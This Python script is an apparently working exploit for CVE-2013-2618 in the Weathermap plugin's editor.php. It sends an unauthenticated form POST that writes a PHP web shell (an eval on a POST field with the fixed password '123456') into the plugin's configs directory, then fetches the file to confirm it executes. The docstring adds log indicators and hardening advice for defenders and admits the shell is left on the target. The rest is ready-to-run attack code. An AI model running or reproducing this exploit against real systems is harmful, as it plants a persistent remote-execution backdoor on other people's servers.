#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CVE-2013-2618
"""Proof-of-concept check labelled CVE-2013-2618 (Weathermap ``editor.php``).

What the script does, as far as this file shows:

1. POSTs a ``set_map_properties`` form to ``/plugins/weathermap/editor.php``
   with ``mapname`` set to ``<unix-timestamp>.php`` and ``map_title`` set to
   a PHP snippet.
2. GETs ``/plugins/weathermap/configs/<mapname>`` and reports success when
   the response body contains the MD5 hex digest of ``POC``.

The script sends no cookie or credential, so a positive result also means the
editor endpoint was reachable without a session.

Reviewer notes for defenders:

* Log indicators: a POST to ``editor.php`` whose ``mapname`` ends in
  ``.php``, followed by a GET for that name under ``configs/``; on disk, any
  ``*.php`` file inside the plugin's ``configs/`` directory.
* Hardening: run a plugin release the vendor lists as fixed for this CVE,
  restrict access to ``editor.php``, and configure the web server so files
  under ``configs/`` are never handed to the PHP interpreter.
* The script does not delete the file it creates. The file stays on the
  target with the fixed password in ``shellpass`` until it is removed.
* ``verify=False`` disables TLS certificate validation for both requests,
  and the urllib3 warning about that is silenced process-wide below.
"""
import hashlib
import sys
import time

import requests
import urllib3

# Silences the InsecureRequestWarning caused by verify=False further down.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# POST field name the written snippet evaluates; also echoed in the result.
shellpass = "123456"

# Marker searched for in the second response: md5("POC") as hex.
signature = hashlib.md5(b"POC").hexdigest()

# PHP placed in the map title; it echoes the marker above when executed.
map_title = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,)

# File name requested from the editor; derived from the current Unix time.
mapname = str(int(time.time())) + ".php"

# Form body for the editor's "set_map_properties" action. Only "mapname" and
# "map_title" vary; the rest are fixed values sent alongside them.
payload = {
    "plug": "0",
    "mapname": mapname,
    "action": "set_map_properties",
    "param": "",
    "param2": "",
    "debug": "existing",
    "node_name": "",
    "node_x": "",
    "node_y": "",
    "node_new_name": "",
    "node_label": "",
    "node_infourl": "",
    "node_hover": "",
    "node_iconfilename": "--NONE--",
    "link_name": "",
    "link_bandwidth_in": "",
    "link_bandwidth_out": "",
    "link_target": "",
    "link_width": "",
    "link_infourl": "",
    "link_hover": "",
    "link_commentin": "",
    "link_commentposin": "95",
    "link_commentout": "",
    "link_commentposout": "5",
    "map_title": map_title,
    "map_legend": "Traffic+Load",
    "map_stamp": "Created:+%b+%d+%Y+%H:%M:%S",
    "map_linkdefaultwidth": "7",
    "map_linkdefaultbwin": "100M",
    "map_linkdefaultbwout": "100M",
    "map_width": "800",
    "map_height": "600",
    "map_pngfile": "",
    "map_htmlfile": "",
    "map_bgfile": "--NONE--",
    "mapstyle_linklabels": "percent",
    "mapstyle_htmlstyle": "overlib",
    "mapstyle_arrowstyle": "classic",
    "mapstyle_nodefont": "3",
    "mapstyle_linkfont": "2",
    "mapstyle_legendfont": "4",
    "item_configtext": "",
    "editorsettings_showvias": "0",
    "editorsettings_showrelative": "0",
    "editorsettings_gridsnap": "NO",
}


def exploit(target):
    """Submit the form to the editor, then verify the result.

    Args:
        target: Base URL of the site; the plugin path is appended to it.

    Returns:
        ``False`` if the POST raised a ``requests`` exception or the
        follow-up check failed; otherwise the string from ``check_shell``.
    """
    editor_endpoint = target + "/plugins/weathermap/editor.php"
    try:
        # The response is not inspected; only transport errors matter here.
        requests.post(editor_endpoint, data=payload, verify=False, timeout=5)
    except requests.exceptions.RequestException:
        return False

    # check_shell yields False or a non-empty string, so "or False" keeps
    # the original two-way outcome.
    return check_shell(target) or False


def check_shell(target):
    """Fetch the written file and look for the MD5 marker in the body.

    Args:
        target: Base URL of the site; the configs path is appended to it.

    Returns:
        ``False`` on a ``requests`` exception or when the marker is absent;
        otherwise ``"<file URL>, <shellpass>"``.
    """
    written_file = target + "/plugins/weathermap/configs/" + mapname
    try:
        response = requests.get(written_file, verify=False, timeout=5)
    except requests.exceptions.RequestException:
        return False

    # The marker only appears if the server executed the file as PHP.
    if signature in response.text:
        return written_file + ", " + shellpass
    return False


def main():
    """Run the check against ``sys.argv[1]`` and print the outcome.

    With no argument the CVE label is printed and nothing is requested.
    """
    if len(sys.argv) < 2:
        print("CVE-2013-2618")
        return

    print(exploit(sys.argv[1]))


if __name__ == "__main__":
    main()